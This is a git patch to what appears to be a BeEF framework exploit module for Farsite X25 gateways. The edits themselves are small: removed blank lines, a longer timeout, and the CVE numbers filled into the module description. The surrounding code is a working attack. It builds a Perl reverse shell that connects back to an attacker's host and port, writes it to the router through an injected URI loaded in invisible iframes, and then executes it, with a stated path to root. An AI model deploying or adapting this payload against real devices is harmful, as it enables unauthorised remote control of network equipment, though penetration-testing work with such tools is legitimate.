From fbac8cd55ae5b7e6ff6791ec039eb88e94d124a8 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Fri, 7 Oct 2016 05:20:49 +0000
Subject: [PATCH] Update PR #1301

---
 modules/exploits/farsite_x25_remote_shell/command.js  | 8 +-------
 modules/exploits/farsite_x25_remote_shell/config.yaml | 2 +-
 2 files changed, 2 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/farsite_x25_remote_shell/command.js b/modules/exploits/farsite_x25_remote_shell/command.js
index de120be7a..1c107739b 100644
--- a/modules/exploits/farsite_x25_remote_shell/command.js
+++ b/modules/exploits/farsite_x25_remote_shell/command.js
@@ -6,22 +6,16 @@ beef.execute(function() {
   var lhost = '<%= @lhost %>';
   var lport = '<%= @lport %>';
 
-
-
   writefile = function() {
     var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
     revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
     revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
-    //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
     var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
     var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
     //About to hit uri
     x25w_<%= @command_id %>.setAttribute('src', uri);
   };
 
-  validate = function() {
-  };
-
   exploit = function() {
     //Command injecting on the router
     var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe();
@@ -31,7 +25,7 @@ beef.execute(function() {
 
   try {
     writefile();
-    setTimeout(exploit,3000);
+    setTimeout(exploit,5000);
   } catch (e) {
     beef.debug(peer + " - Exploit failed: " + e.message);
   }
diff --git a/modules/exploits/farsite_x25_remote_shell/config.yaml b/modules/exploits/farsite_x25_remote_shell/config.yaml
index 0c03bc878..ccc8b8d2e 100644
--- a/modules/exploits/farsite_x25_remote_shell/config.yaml
+++ b/modules/exploits/farsite_x25_remote_shell/config.yaml
@@ -5,7 +5,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "Farsite X25 gateway remote code execution"
-            description: "This module exploits CVE-2014- to write a payload to the router and CVE-2014- to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
+            description: "This module exploits CVE-2014-7175 to write a payload to the router and CVE-2014-7173 to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
             authors: ["Wireghoul"]
             target:
                 working: ["All"]